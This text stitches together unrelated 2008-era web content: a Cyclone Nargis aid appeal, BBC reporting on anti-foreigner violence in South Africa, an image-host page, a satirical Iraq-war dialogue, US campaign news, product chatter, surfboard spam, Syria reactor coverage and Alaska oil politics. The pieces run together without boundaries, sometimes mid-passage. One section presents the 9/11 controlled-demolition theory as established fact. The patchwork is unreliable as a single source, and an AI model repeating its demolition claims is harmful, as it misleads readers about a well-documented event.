Following Saturday ’s devastating Cyclone Nargis in Myanmar ( Burma ) , Architecture for Humanity is asking for help in rebuilding the country over the long term .
They write :
While the media will focus its attention on the loss of life , there will be millions displaced in the coming weeks — and like most natural disasters , there ’s no plan for long - term sustainable reconstruction .
Large aid agencies like Oxfam and Care will be knee - deep in immediate delivery of aid .
How will the country respond to the long - term strategic need to rebuild the country ?
We will need to raise a minimum of $ 10,000 to provide design services to communities affected by the disaster .
This is a small start , but could affect tens of thousands of those displaced .
At least eight of those killed are thought to be from Mozambique Several thousand foreigners have fled South Africa after days of violent attacks by angry mobs .
Mozambique is laying on special buses , which have taken some 9,000 people home this week , an official said .
Some Zimbabweans are also going home , preferring to risk the violence there than stay in South Africa .
At least 42 people have been killed and some 15,000 have sought shelter from the mobs , who blame foreigners for high crime and unemployment .
The army is to be deployed in South Africa to contain the violence - for the first time since the end of apartheid .
Police in Johannesburg , where most of the attacks have taken place , say the situation is now much quieter than in recent days .
I have a little girl at home - I want to see her grow up
Henry , 24
But attacks have been reported in North - West province for the first time , after violence in Durban in recent days .
The police have used rubber bullets and tear gas to disperse the crowds .
There were also attacks in the north - eastern Mpumalanga province .
" Two buses were burnt last night and one Mozambican guy was shot .
He is in hospital , " said police spokeswoman Sibongile Nkosi .
Chaotic scenes " I am just scared for my life , " Henry , a 24 - year - old Zimbabwean , told the BBC as he prepared to board a bus taking him home .
" I have a little girl at home - I want to see her grow up , " he said after seeing a man shot dead at the weekend .
SOUTH AFRICA Foreign population : 3 - 5 m Majority from Zimbabwe , also Mozambique , Nigeria Total population : 49 m Unemployment rate : 30 %
How can S Africa end the violence ?
Tensions erupt in city of promise Bloggers want end to violence " I think Zimbabwe is safe . "
Some three million Zimbabweans are believed to be in South Africa , fleeing poverty and violence at home .
The BBC's Karen Allen saw chaotic scenes and scuffles at a Johannesburg police station , as Mozambicans tried to scramble on board buses to take them home .
She says that those who could not get places spent the night in waste ground outside the police station , during the southern hemisphere winter .
Many had been beaten and had their property stolen .
Leonardo Boby , deputy national director of migration , said that about 3,000 people had returned to Mozambique each day this week so far .
" We are having hectic moments with the return of these people , " he said .
At least eight of those killed are thought to be from Mozambique .
Tavern attacked
The violence also spread to the port city of Durban on Tuesday , where some 700 African migrants sought refuge in a church .
Day of violence in Johannesburg suburb
In pictures
" A mob of plus / minus 200 were gathering on the streets carrying bottles and knobkerries [ wooden clubs ] busy attacking people on the streets , " provincial police spokeswoman Superintendent Phindile Radebe told AFP news agency .
" They attacked one of the taverns there believed to be owned by Nigerians , " she said .
A defence ministry spokesman said soldiers would only be deployed onto the streets when requested by the police .
The attacks on foreigners began 11 May in the township of Alexandra , north of Johannesburg , before spreading to the city centre and across the Gauteng region .
HAVE YOUR SAY I am ashamed that we South Africans have not learnt the lessons of our past better Lorna , Johannesburg Mobs have been roaming townships looking for foreigners , many of whom have sought refuge in police stations , churches and community halls .
Kgalema Motlanthe , secretary general of the ruling ANC , on Wednesday said many of the immigrants were able to get jobs in South Africa because they were better qualified than the locals , whose education was disrupted by apartheid .
He said there was an " envy from South African sisters and brothers , who did not have the opportunity to acquire this education or skills .
" We need to address the young generation without skills in order to enable them to make a living . "
E-mail this to a friend Printable version Bookmark with : Delicious
Digg
reddit
Facebook
StumbleUpon
What are these ?
Information
Filename : mcsamehaaretz.tiff
Size : 1242x778
Uploaded : 2008-05-12
Tags
mccain haaretz
Popular tags on the site
magic 1nsane ranma shevington hr_giger cia death_note bonton smashing falco paintball cheerleader megaten invasion manga ryushin_09 fxc dilbert rx7 bier wallpaper renee stephy chubby glastonbury ka_series_l dubai soepkip forza ebooks krystal himos rwpeuro2006 donnamodelo.com jessica cat comic yuko emma 1999 family giger sprites rippenspreizer ryushin_15 avril spain ryushin_14 mariage
Removal
The picture is uploaded by a user of this site .
The site has no responsibility for it .
If this image is illegal , please send an e-mail to abuse ( and put ILLEGAL + URL in the subject ) .
We will not remove any pictures that are just immoral or in any way legal to host under Swedish law .
This piece is currently floating around cyberspace .
Q : Daddy , why did we have to attack Iraq ?
A : Because they had weapons of mass destruction honey .
Q : But the inspectors did n’t find any weapons of mass destruction .
A : That ’s because the Iraqis were hiding them .
Q : And that ’s why we invaded Iraq ?
A : Yep .
Invasions always work better than inspections .
Q : But after we invaded them , we STILL did n’t find any weapons of mass destruction , did we ?
A : That ’s because the weapons are so well hidden .
Do n’t worry , we ’ll find something , probably right before the 2004 election .
Q : Why did Iraq want all those weapons of mass destruction ?
A : To use them in a war , silly .
Q : I ’m confused .
If they had all those weapons that they planned to use in a war , then why did n’t they use any of those weapons when we went to war with them ?
A : Well , obviously they did n’t want anyone to know they had those weapons , so they chose to die by the thousands rather than defend themselves .
Q : That does n’t make sense Daddy .
Why would they choose to die if they had all those big weapons to fight us back with ?
A : It ’s a different culture .
It ’s not supposed to make sense .
Q : I do n’t know about you , but I do n’t think they had any of thoseweapons our government said they did .
A : Well , you know , it does n’t matter whether or not they had those weapons .
We had another good reason to invade them anyway .
Q : And what was that ?
A : Even if Iraq did n’t have weapons of mass destruction , Saddam Hussein was a cruel dictator , which is another good reason to invade another country .
Q : Why ?
What does a cruel dictator do that makes it OK to invade his country ?
A : Well , for one thing , he tortured his own people .
Q : Kind of like what they do in China ?
A : Do n’t go comparing China to Iraq .
China is a good economic competitor , where millions of people work for slave wages in sweatshops to make U.S. corporations richer .
Q : So if a country lets its people be exploited for American corporate gain , it ’s a good country , even if that country tortures people ?
A : Right .
Q : Why were people in Iraq being tortured ?
A : For political crimes , mostly , like criticizing the government .
People who criticized the government in Iraq were sent to prison and tortured .
Q : Is n’t that exactly what happens in China ?
A : I told you , China is different .
Q : What ’s the difference between China and Iraq ?
A : Well , for one thing , Iraq was ruled by the Ba’ath party , while China is Communist .
Q : Did n’t you once tell me Communists were bad ?
A : No , just Cuban Communists are bad .
Q : How are the Cuban Communists bad ?
A : Well , for one thing , people who criticize the government in Cuba are sent to prison and tortured .
Q : Like in Iraq ?
A : Exactly .
Q : And like in China , too ?
A : I told you , China ’s a good economic competitor .
Cuba , on the other hand , is not .
Q : How come Cuba is n’t a good economic competitor ?
A : Well , you see , back in the early 1960s , our government passed some laws that made it illegal for Americans to trade or do any business with Cuba until they stopped being communists and started being capitalists like us .
Q : But if we got rid of those laws , opened up trade with Cuba , and started doing business with them , would n’t that help the Cubans become capitalists ?
A : Do n’t be a smart - ass .
Q : I did n’t think I was being one .
A : Well , anyway , they also do n’t have freedom of religion in Cuba .
Q : Kind of like China and the Falun Gong movement ?
A : I told you , stop saying bad things about China .
Anyway , Saddam Hussein came to power through a military coup , so he ’s not really a legitimate leader anyway .
Q : What ’s a military coup ?
A : That ’s when a military general takes over the government of a country by force , instead of holding free elections like we do in the United States .
Q : Did n’t the ruler of Pakistan come to power by a military coup ?
A : You mean General Pervez Musharraf ?
Uh , yeah , he did , but Pakistan is our friend .
Q : Why is Pakistan our friend if their leader is illegitimate ?
A : I never said Pervez Musharraf was illegitimate .
Q : Did n’t you just say a military general who comes to power by forcibly overthrowing the legitimate government of a nation is an illegitimate leader ?
A : Only Saddam Hussein .
Pervez Musharraf is our friend , because he helped us invade Afghanistan .
Q : Why did we invade Afghanistan ?
A : Because of what they did to us on September 11th .
Q : What did Afghanistan do to us on September 11th ?
A : Well , on September 11th , nineteen men , fifteen of them Saudi Arabians , hijacked four airplanes and flew three of them into buildings , killing over 3,000 Americans .
Q : So how did Afghanistan figure into all that ?
A : Afghanistan was where those bad men trained , under the oppressive rule of the Taliban .
Q : Are n’t the Taliban those bad radical Islamics who chopped off people ’s heads and hands ?
A : Yes , that ’s exactly who they were .
Not only did they chop off people ’s heads and hands , but they oppressed women , too .
Q : Did n’t the Bush administration give the Taliban 43 million dollars back in May of 2001 ?
A : Yes , but that money was a reward because they did such a good job fighting drugs .
Q : Fighting drugs ?
A : Yes , the Taliban were very helpful in stopping people from growing opium poppies .
Q : How did they do such a good job ?
A : Simple .
If people were caught growing opium poppies , the Taliban would have their hands and heads cut off .
Q : So , when the Taliban cut off people ’s heads and hands for growing flowers , that was OK , but not if they cut people ’s heads and hands off for other reasons ?
A : Yes .
It ’s OK with us if radical Islamic fundamentalists cut off people ’s hands for growing flowers , but it ’s cruel if they cut off people ’s hands for stealing bread .
Q : Do n’t they also cut off people ’s hands and heads in Saudi Arabia ?
A : That ’s different .
Afghanistan was ruled by a tyrannical patriarchy that oppressed women and forced them to wear burqas whenever they were in public , with death by stoning as the penalty for women who did not comply .
Q : Do n’t Saudi women have to wear burqas in public , too ?
A : No , Saudi women merely wear a traditional Islamic body covering .
Q : What ’s the difference ?
A : The traditional Islamic covering worn by Saudi women is a modest yet fashionable garment that covers all of a woman ’s body except for her eyes and fingers .
The burqa , on the other hand , is an evil tool of patriarchal oppression that covers all of a woman ’s body except for her eyes and fingers .
Q : It sounds like the same thing with a different name .
A : Now , do n’t go comparing Afghanistan and Saudi Arabia .
The Saudis are our friends .
Q : But I thought you said 15 of the 19 hijackers on September 11th were from Saudi Arabia .
A : Yes , but they trained in Afghanistan .
Q : Who trained them ?
A : A very bad man named Osama bin Laden .
Q : Was he from Afghanistan ?
A : Uh , no , he was from Saudi Arabia too .
But he was a bad man , a very bad man .
Q : I seem to recall he was our friend once .
A : Only when we helped him and the mujahadeen repel the Soviet invasion of Afghanistan back in the 1980s .
Q : Who are the Soviets ?
Was that the Evil Communist Empire Ronald Reagan talked about ?
A : There are no more Soviets .
The Soviet Union broke up in 1990 or thereabouts , and now they have elections and capitalism like us .
We call them Russians now .
Q : So the Soviets , I mean , the Russians , are now our friends ?
A : Well , not really .
You see , they were our friends for many years after they stopped being Soviets , but then they decided not to support our invasion of Iraq , so we ’re mad at them now .
We ’re also mad at the French and the Germans because they did n’t help us invade Iraq either .
Q : So the French and Germans are evil , too ?
A : Not exactly evil , but just bad enough that we had to rename French fries and French toast to Freedom Fries and Freedom Toast .
Q : Do we always rename foods whenever another country does n’t do what we want them to do ?
A : No , we just do that to our friends .
Our enemies , we invade .
Q : But was n’t Iraq one of our friends back in the 1980s ?
A : Well , yeah .
For a while .
Q : Was Saddam Hussein ruler of Iraq back then ?
A : Yes , but at the time he was fighting against Iran , which made him our friend , temporarily .
Q : Why did that make him our friend ?
A : Because at that time , Iran was our enemy .
Q : Is n’t that when he gassed the Kurds ?
A : Yeah , but since he was fighting against Iran at the time , we looked the other way , to show him we were his friend .
Q : So anyone who fights against one of our enemies automatically becomes our friend ?
A : Most of the time , yes .
Q : And anyone who fights against one of our friends is automatically an enemy ?
A : Sometimes that ’s true , too .
However , if American corporations can profit by selling weapons to both sides at the same time , all the better .
Q : Why ?
A : Because war is good for the economy , which means war is good for America .
Also , since God is on America ’s side , anyone who opposes war is a godless un-American Communist .
Do you understand now why we attacked Iraq ?
Q : I think so .
We attacked them because God wanted us to , right ?
A : Yes .
Q : But how did we know God wanted us to attack Iraq ?
A : Well , you see , God personally speaks to George W. Bush and tells him what to do .
Q : So basically , what you ’re saying is that we attacked Iraq because George W. Bush hears voices in his head ?
A : Yes !
You finally understand how the world works .
Now close your eyes , make yourself comfortable , and go to sleep .
Good night .
Slideshow ( 4 images )
UNITED NATIONS ( Reuters ) - U.N. Secretary - General Ban Ki-moon on Friday condemned as “ offensively anti-Islamic ” a Dutch lawmaker ’s film that accuses the Koran of inciting violence .
Ban acknowledged efforts by the government of the Netherlands to stop the broadcast of the film , which was launched by Islam critic Geert Wilders over the Internet , and appealed for calm to those “ understandably offended by it . ”
“ There is no justification for hate speech or incitement to violence , ” Ban said in a statement .
“ The right of free expression is not at stake here . ”
The short film , titled “ Fitna , ” an Arabic term sometimes translated as “ strife , ” intersperses images of the September 11 attacks on the United States and Islamist bombings with quotations from the Koran .
The film urges Muslims to tear out “ hate - filled ” verses from the Koran and starts and finishes with a cartoon of the Prophet Mohammad with a bomb under his turban , accompanied by the sound of ticking .
Several Muslim countries , including Iran , Pakistan and Indonesia , have also condemned the film .
“ Freedom must always be accompanied by social responsibility , ” Ban said .
“ We must also recognize that the real fault line is not between Muslim and Western societies , as some would have us believe , but between small minorities of extremists , on different sides , with a vested interest in stirring hostility and conflict , ” Ban said .
YOU ARE ZERO - THE PHILOSOPHY OF ZEROISM
Nietzsche , Artaud , Baudelaire and Camus all realized that their life will come to Zero .
Zeroism is a rebellious journal against the tidal wave of CAPITALISTIC institutions , determined to lie to people so they can exploit them for money .
Counselors , Churches and Society at large want you to feel someone - THE SOMEONE THEY WANT YOU TO BE .
I urge you to be whoever the fuck you want to be , whether it be mad , glad or completely insane .
Because at the end of the day WE ARE ALL ZERO ANYWAY .
Barack Obama 's campaign urged federal regulators yesterday to investigate whether a pro-Hillary Clinton advocacy group is breaking campaign finance laws .
The American Leadership Project , one of the growing number of quasi - independent groups involved in the presidential race , was started by Clinton allies , and its major funding comes from the American Federation of State , County and Municipal Employees , a union that has endorsed Clinton .
On Tuesday , it began airing a TV ad in Indiana going after Obama 's economic plan and has said it will spend $ 920,000 on the ads .
Obama 's campaign says that ad is misleading and lodged a formal complaint with the Federal Election Commission , saying the group should have to register as a political committee , disclose contributors , and abide by contribution limits .
" From its inception , ALP has made clear that its objective is to help Hillary Clinton win the Democratic nomination for president , " Obama campaign lawyers write in the complaint .
Jason Kinney , ALP chairman and a California Democratic strategist , responded , " We have strictly and carefully adhered to every governing law and regulation , including the content of our communications and our full and timely disclosures . "
The ALP is a 527 group , referring to a section of the tax code , that can raise unlimited amounts from donors and can air issue - based ads ; however it is not supposed to air ads that expressly advocate for or against a candidate and cannot coordinate with a campaign .
Obama has also been assisted by the loosely - regulated groups , which are expected to spend millions this election .
Obama 's campaign lawyer , Robert Bauer , in his complaint and in a teleconference with reporters , likened the group to organizations that had to pay hundreds of thousands of dollars in fines for ad campaigns in the 2004 presidential election .
Among them was the Swift Boat Veterans for Truth , which attacked Democrat John F. Kerry 's service in Vietnam and his subsequent antiwar stance .
" This organization is a Swift Boat wannabe , and it 's violating the law in exactly the same way , " Bauer said .
GLOBE STAFF AND AP
The Obamas share , hear stories of struggle in Ind .
Barack Obama took his campaign yesterday to a neighborhood park and a family 's kitchen table to reach out to elusive working - class voters in Indiana .
He and his wife , Michelle , sat in an Indianapolis park with playground equipment as a backdrop for television .
Michelle Obama , never one to mince words , said neither the Democratic nor Republican parties have solved economic problems that are getting worse by the day .
It would take someone " decent " like her husband , she said .
In suburban Beech Grove , they had lunch and chatted with Mike and Cheryl Fischer , hearing their stories of struggle .
He 's a machinist at a local Amtrak facility where 77 jobs are threatened this summer .
" Michelle and I grew up in a pretty modest situation , " said Obama , who said they understand the pressures facing working families .
" We are still so close to the lives most Americans are living , " added Michelle Obama .
GLOBE STAFF AND AP
Maya Angelou adds prose to new Clinton TV ad
Hillary Clinton 's campaign apparently believes that poet Maya Angelou can help her make inroads among African - Americans and the liberal intelligentsia - two groups in which rival Barack Obama dominates .
Clinton 's camp released an open letter from Angelou last week .
Now she 's featured in a 60 - second TV ad the campaign announced yesterday will air in North Carolina , which votes Tuesday .
In the spot , Angelou praises the New York senator almost poetically .
" Hillary Clinton is a prayer of every American who really longs for fair play , " says Angelou , a professor at Wake Forest University in Winston - Salem , N.C. , who read a poem at Bill Clinton 's inauguration in 1993 .
" She intends to help our country become what it can become .
She dares to say human beings are more alike than we are unalike . "
FOON RHEE
Group bashes McCain in ' Mission accomplished ' ad
The antiwar group MoveOn.org used yesterday 's fifth anniversary of President Bush 's declaration of " Mission accomplished " in Iraq to bash John McCain with a TV ad arguing that the presumptive Republican nominee would be worse .
As candle after candle , is lit on a red - white - and - blue cake decorated with " Mission Accomplished " in icing , the announcer cites McCain 's remark in New Hampshire that US troops could be in Iraq for 100 years .
McCain has explained that he meant a military presence akin to peacekeepers in South Korea , but Democrats have hammered him for supporting an indefinite continuation of the war .
FOON RHEE
© Copyright 2008 Globe Newspaper Company .
I think i nearly drooled on my keyboard reading about this Adobe Light - Field Camera .
I am by no means a traditional ( or even a good ) photographer .
I know i’d be no where without Photoshop , playful compositions , and a fancy camera .
As a product of my technology , i am sitting here dreaming about what could be done if each image could contain 19 different depths of field … a magical adobe “ focus brush ” that would paint using the seemlessly morphing interstitial images the software already created from all the image data .
Watch the video after the jump .
Seriously this fly - eye lens capturing multiple perspectives and instantly being able to process all the various pieces of data completely changes the possibilities of not only photo - editing , but HOW we perceive photography and imagery … ok , i’m giddy for the day .
See more images and the video below !
An Overview of the Best Surfboards and Accessories
There are numerous experts who are reputed in designing the right custom surfboards thus the need for the people to consider locating them .
You should go to the custom - designed surfboards so that you can benefit .
Most of the people have been at the forefront in enjoying water [… ]
Numerous structural engineers now publicly challenge the government 's account of the destruction of the Trade Centers on 9/11 , including :
Two professors of structural engineering at a prestigious Swiss university ( Dr. Joerg Schneider and Dr. Hugo Bachmann ) said that , on 9/11 , World Trade Center 7 was brought down by controlled demolition ( translation here )
" Photos of the steel , evidence about how the buildings collapsed , the unexplainable collapse of WTC 7 , evidence of thermite in the debris as well as several other red flags , are quite troubling indications of well planned and controlled demolition "
" Why would all 110 stories drop straight down to the ground in about 10 seconds , pulverizing the contents into dust and ash - twice .
Why would all 47 stories of WTC 7 fall straight down to the ground in about seven seconds the same day ?
It was not struck by any aircraft or engulfed in any fire .
An independent investigation is justified for all three collapses including the surviving steel samples and the composition of the dust . "
" WTC 7 Building could not have collapsed as a result of internal fire and external debris .
NO plane hit this building .
This is the only case of a steel frame building collapsing through fire in the world .
The fire on this building was small & localized therefore what is the cause ? "
" In my view , the chances of the three buildings collapsing symmetrically into their own footprint , at freefall speed , by any other means than by controlled demolition , are so remote that there is no other plausible explanation ! "
" Near - freefall collapse violates laws of physics .
Fire induced collapse is not consistent with observed collapse mode . . . . "
" I began having doubts about , so called , official explanations for the collapse of the WTC towers soon after the explanations surfaced .
The gnawing question that lingers in my mind is :
How did the structures collapse in near symmetrical fashion when the apparent precipitating causes were asymmetrical loading ?
The collapses defies common logic from an elementary structural engineering perspective .
“ If ” you accept the argument that fire protection covering was damaged to such an extent that structural members in the vicinity of the aircraft impacts were exposed to abnormally high temperatures , and “ if ” you accept the argument that the temperatures were high enough to weaken the structural framing , that still does not explain the relatively concentric nature of the failures .
Neither of the official precipitating sources for the collapses , namely the burning aircraft , were centered within the floor plan of either tower ; both aircraft were off - center when they finally came to rest within the respective buildings .
This means that , given the foregoing assumptions , heating and weakening of the structural framing would have been constrained to the immediate vicinity of the burning aircraft .
Heat transmission ( diffusion ) through the steel members would have been irregular owing to differing sizes of the individual members ; and , the temperature in the members would have dropped off precipitously the further away the steel was from the flames — just as the handle on a frying pan does n't get hot at the same rate as the pan on the burner of the stove .
These factors would have resulted in the structural framing furthest from the flames remaining intact and possessing its full structural integrity , i.e. , strength and stiffness .
Structural steel is highly ductile , when subjected to compression and bending it buckles and bends long before reaching its tensile or shear capacity .
Under the given assumptions , “ if ” the structure in the vicinity of either burning aircraft started to weaken , the superstructure above would begin to lean in the direction of the burning side .
The opposite , intact , side of the building would resist toppling until the ultimate capacity of the structure was reached , at which point , a weak - link failure would undoubtedly occur .
Nevertheless , the ultimate failure mode would have been a toppling of the upper floors to one side — much like the topping of a tall redwood tree — not a concentric , vertical collapse .
For this reason alone , I rejected the official explanation for the collapse of the WTC towers out of hand .
Subsequent evidence supporting controlled , explosive demolition of the two buildings are more in keeping with the observed collapse modalities and only serve to validate my initial misgivings as to the causes for the structural failures . "
" We design and analyze buildings for the overturning stability to resist the lateral loads with the combination of the gravity loads .
Any tall structure failure mode would be a fall over to its side .
It is impossible that heavy steel columns could collapse at the fraction of the second within each story and subsequently at each floor below .
We do not know the phenomenon of the high rise building to disintegrate internally faster than the free fall of the debris coming down from the top .
The engineering science and the law of physics simply does n't know such possibility .
Only very sophisticated controlled demolition can achieve such result , eliminating the natural dampening effect of the structural framing huge mass that should normally stop the partial collapse .
The pancake theory is a fallacy , telling us that more and more energy would be generated to accelerate the collapse .
Where would such energy would be coming from ? "
There are many other structural engineers who have questioned the government 's account in private .
We support them and wish them courage to discuss these vital issues publicly .
See also See this website and this website for further additions .
There are many other structural engineers who have questioned the government 's account in private .
We support them and wish them courage to discuss these vital issues publicly .
See also this
Kamal S. Obeid , structural engineer , with a masters degree in Engineering from UC Berkeley , of Fremont , California , says Ronald H. Brookman , structural engineer , with a masters degree in Engineering from UC Davis , of Novato California , writes Graham John Inman , structural engineer , of London , England , points out Paul W. Mason , structural engineer , of Melbourne , Australia , argues David Scott , Structural Engineer , of Scotland , argues : Nathan Lomba , Structural Engineer , of Eureka , California , statesEdward E. Knesl , civil and structural engineer , of Phoenix , Arizona , writes : David Topete , civil and structural engineer , San Francisco , California Charles Pegelow , structural engineer , of Houston , Texas ( and see this Dennis Kollar , structural engineer , of West Bend , Wisconsin Doyle Winterton , structural engineer ( retired ) William Rice , P.E. , structural engineer , former professor of Vermont Technical College
The head of the United Nations nuclear watchdog has reacted with fury at the United States ' delay in passing on intelligence , after Washington accused North Korea of helping Syria to build secretly a nuclear reactor .
According to the Central Intelligence Agency the reactor , which may have been part of a nuclear weapons programme , was destroyed by an Israeli air raid months before its completion .
Mohamed ElBaradei , the International Atomic Energy Agency chief , issued a stiffly worded statement in which he criticised the US and Israel , as well as Syria , which should have informed the IAEA if it was building a nuclear reactor .
Download the new Independent Premium app Sharing the full story , not just the headlines
Noting that the IAEA was only informed by the Bush administration about the nuclear reactor claim on Thursday , seven months after the Israeli raid , he deplored the fact that the information had not been provided to the agency in a " timely " manner .
Mr ElBaradei also pointed out that , according to the information provided by the US , " the reactor was not yet operational and no nuclear material had been introduced into it " .
According to a Western diplomat in Vienna , that meant that if the UN inspectors had been alerted earlier , they would have been able to verify the facts on the ground .
" Now nobody is ever going to know for sure , " the diplomat said .
In his statement , Mr ElBaradei criticised Israel for its " unilateral use of force " which undermined the " due process of verification " .
Mr ElBaradei was said to be incensed by the American failure to inform the UN watchdog about the possible risk of nuclear proliferation when the Americans became aware of the nature of the site in 2006 .
" What kind of non-proliferation regime is this , when they come to the IAEA months after it 's been bombed ? " the diplomat said .
The IAEA chief pledged to investigate the US information " with the seriousness it deserves " .
The images that were released to the press after a closed - door briefing to US Congressional panels raised new questions as the date of the alleged reactor pictures was not clear .
The head of the Syrian nuclear commission was shown standing next to a car with a Syrian number plate with the head of North Korea 's Yongbyon reactor , which has made weapons grade plutonium .
But there was no indication of the date .
American officials told reporters that their suspicions were raised because of the secrecy surrounding the project , in comments that had echoes of the Iraq weapons of mass destruction fiasco .
Israel , the only nuclear power in the Middle East , refused to comment on the matter .
Syria continued to deny the charges as " ridiculous " , although the reactor images were described as " compelling " by the American nuclear expert David Albright .
But he added that the lack of other facilities " has to give pause before accusing Syria of having an active weapons programme " .
Syria accused the Bush administration of having been " apparently party to the execution " of the air raid .
An American official said Washington did not give Israel any " green light " to strike the area , although The New York Times reported that there had been extensive discussions between the US and Israel before the raid on 6 September last year .
Daily coronavirus briefing
No hype , just the advice and analysis you need Enter your email address Continue Continue Please enter an email address Email address is invalid Fill out this field Email address is invalid Email already exists .
Log in to update your newsletter preferences
Register with your social account or click here to log in I would like to receive morning headlines Monday - Friday plus breaking news alerts by email Update newsletter preferences
" It 's sheer fabrication , " said the spokesman for the Syrian embassy in London , Jihad Makdissi , adding that the reactor images showed a deserted military building .
" The CIA giving testimony is the same CIA that briefed Colin Powell who spoke at the UN Security Council about Iraqi weapons of mass destruction . "
Asked about the photograph of the scientists , Mr Makdissi pointed out that " Syria and North Korea have economic relations .
This person was not smuggled into Syria – did you see a nuclear rocket in his hands ? "
The impact on North Korea 's nuclear disarmament commitments at six - party talks remained unclear last night .
The chief US negotiator , Christopher Hill , said that the co-operation between Syria and North Korea was no longer active , suggesting that the Bush administration had already turned the page .
The need for more answers
* Questions for Syria and N Korea
Why does Syria continue to deny that a reactor was being built despite the images presented to Congress ?
Why does North Korea deny the accusations ?
Where and why did the head of the Syrian atomic energy commission meet the North Korean nuclear scientist ?
Why did Syria not keep the International Atomic Energy Agency informed of the reactor progress in line with IAEA regulations ?
Why did Syria not respond after the Israeli strike ?
Why did Syria continue its back - channel talks with Israel after the raid ?
* Questions for the US and Israel
Why did the US wait until last Thursday to inform the IAEA about the reactor when it had been aware of the site possibly as early as 2006 ?
Why did it take the CIA seven months to reveal this information to Congress ?
Does the intelligence show any intention to build a weapon ?
Is there any directevidence of North Koreans actually at the site ?
The photograph of the Syrian and North Korean nuclear scientists was taken at another location
Why did Israel act unilaterally to destroy the site before IAEA inspectors had a chance to visit ?
To what extent was the US involved in the Israeli air strike ?
When did Syria and North Korea stop their nuclear co-operation , which the US says has been halted ?
For indispensable reporting on the coronavirus crisis , the election , and more , subscribe to the Mother Jones Daily newsletter .
John McCain will fire you for lobbying for Burma , but he ’ll still take your money .
Republican operatives Doug Davenport and Doug Goodyear were both quietly released from their duties with the McCain campaign this week when it was revealed that their Washington lobbying firm , DCI Group , had been paid $ 348,000 to represent Burma ’s repressive military junta in 2002 .
McCain ’s critics noted that top McCain aide Charlie Black has lobbied for authoritarian regimes as nasty or worse than Burma ’s , raising the question of whether McCain will cut ties with tainted figures only when it is politically expedient for him to do so .
There are other facts in the situation that may prove controversial .
The two lobbyists for Burma were also donors to McCain .
Doug Goodyear , DCI Group ’s chief executive and the man McCain had selected to run the GOP national convention , and his wife Carla donated $ 4,600 to McCain ’s presidential campaign and $ 2,500 to McCain ’s Straight Talk America PAC .
Carla Goodyear also donated $ 1,000 to McCain ’s 2004 Senate reelection bid .
Doug Davenport , the head of DCI Group ’s lobbying arm and a former regional campaign manager for McCain , and his wife Kelley contributed $ 6,900 to McCain ’s presidential campaign and $ 3,500 to his PAC .
Other DCI Group employees have donated $ 2,000 to McCain .
All told , DCI Group employees and their spouses have sent $ 20,500 to McCain .
McCain fired the two DCI Group executives from his campaign , but will he return their contributions ?
We called McCain ’s press office to ask and have not yet received a response .
Can it be that McCain is willing to separate himself from lobbyists working for Burma but will cling to their cash ?
Alaska plays hardball with oil companies
Some analysts wonder if governor is asking too much as she seeks more revenue for her state in time of soaring energy prices
Alaska Gov. Sarah Palin is challenging some of the world 's biggest oil companies , and like Venezuela President Hugo Chavez , she 's not backing down .
Palin threatened to evict Exxon Mobil Corp. , the world 's biggest oil company , and partners BP , Chevron and ConocoPhillips from a state - owned gas field , winning their promise to increase Alaska 's natural gas output 17 percent .
She raised taxes on oil profits by $ 1.5 billion a year and rejected industry ownership of a $ 25 billion pipeline .
Politicians and energy companies are haggling for revenue with oil more than $ 100 a barrel .
Exxon Mobil and partners say higher taxes may lead to fewer investments in Alaska , home to the second - largest U.S. reserves behind Texas .
None has quit the state .
Exxon Mobil and ConocoPhillips last year left Venezuela rather than accept lower profits when Chavez seized oil fields .
" We 've got to play hardball , " Palin , a Republican , says in an interview .
Alaska relies on the energy industry for 85 percent of tax revenue and 33 percent of jobs .
" The time is right to develop these resources because of the price of fuel . "
' That kind of risk '
Palin 's approach may backfire , prompting the largest energy companies to decide that Alaska is no longer profitable , says Ron Denhardt , an analyst at Strategic Energy & Economic Research in Winchester , Mass .
A pullout would leave the state to smaller companies lacking the skill to maximize oil output and tax receipts , he says .
" The economics of huge projects like these have got to look really good for a company to take on that kind of risk , " Denhardt says .
" We do n't know yet if she 's asking for too much . "
Palin seeks to auction drilling rights for Point Thomson on Alaska 's North Slope to accelerate development of gas reserves with a value of $ 71 billion at current prices .
The state has n't estimated tax revenue from the plan .
Exxon Mobil and its partners , which wo n't disclose their return - on - investment requirements , say they are hamstrung by the lack of a pipeline .
" The state is taking a very aggressive stance , " says James Bowles , president of ConocoPhillips ' Alaska operations .
" We see it as a great risk to the investments we make . "
ConocoPhillips , based in Houston , will scale back its $ 1 billion Alaska drilling plan for 2008 because of higher taxes , Bowles says .
Doug Suttles , president of BP's Alaska business , said his company is committed to working with the state as oil prices rise .
Small - town mayor
Palin , 44 , graduated from high school in Wasilla , Alaska , a town of 6,700 that 's 40 miles north of Anchorage .
The Iditarod Trail Sled Dog Race starts there each March .
She left home to attend the University of Idaho .
Palin returned home and became mayor in 1996 , her highest elected office until being sworn in as governor in December 2006 .
Chavez , 53 , was jailed in 1992 for leading an unsuccessful military coup and was elected president six years later .
He forced six U.S. and European oil companies last year to surrender operating control and majority stakes in fields that pump about $ 365 million of crude a week .
ConocoPhillips and Exxon Mobil Corp. left the country .
Chevron , BP of London , Norway 's StatoilHydro and France 's Total accepted the arrangement .
Difference in tactics
Palin says there 's a difference between her tactics and the strategy of Chavez , an admirer of Fidel Castro who says he wants to use Venezuela 's oil wealth to usher in " 21st - century socialism . "
" We have a democratic government in Alaska , a representative form of government here in America , where we would never take over from industry , " Palin says .
" But we have the right to demand that provisions in leases are adhered to . "
' Our laws '
Venezuela 's seizure of property was democratically approved because " a majority of our people voted for our constitution and our laws , " Energy and Oil Minister Rafael Ramirez says .
Palin took on the energy industry right away , discarding a $ 25 billion pipeline agreement negotiated by her Republican predecessor , Frank Murkowski , calling it too generous .
The accord would have violated the state constitution by freezing corporate natural - gas taxes for more than three decades , says Jerry McBeath , co-author of The Political Economy of Oil in Alaska : Multinationals vs. the State , to be released this month .
" She came into office on an insurgent campaign and took the ethical high road by saying there will be no secret deals , " McBeath says .
" This is unusual in the history of this state . "
METHANE HYDRATES
Think fresh - frozen natural gas , buried in the Arctic permafrost and under seabeds .
In a speech last spring , Fed chair Alan Greenspan sent reporters scurrying when he noted that US methane hydrates reserves are estimated at 200 quadrillion cubic feet - 33 times the global reserves of natural gas .
No one has figured out how to tap them , but Canadian researchers , the US energy department , and BP are working on it .
Current cost : $ 90/b.o.e. *
Environmental friendliness :
Technological maturity :
Carbon emissions :
Potential oil killer : Yes
US reserves : 10,882 gasoline years
Global reserves : 72 quadrillion b.o.e. Global production 2004 : 0
HYDROGEN
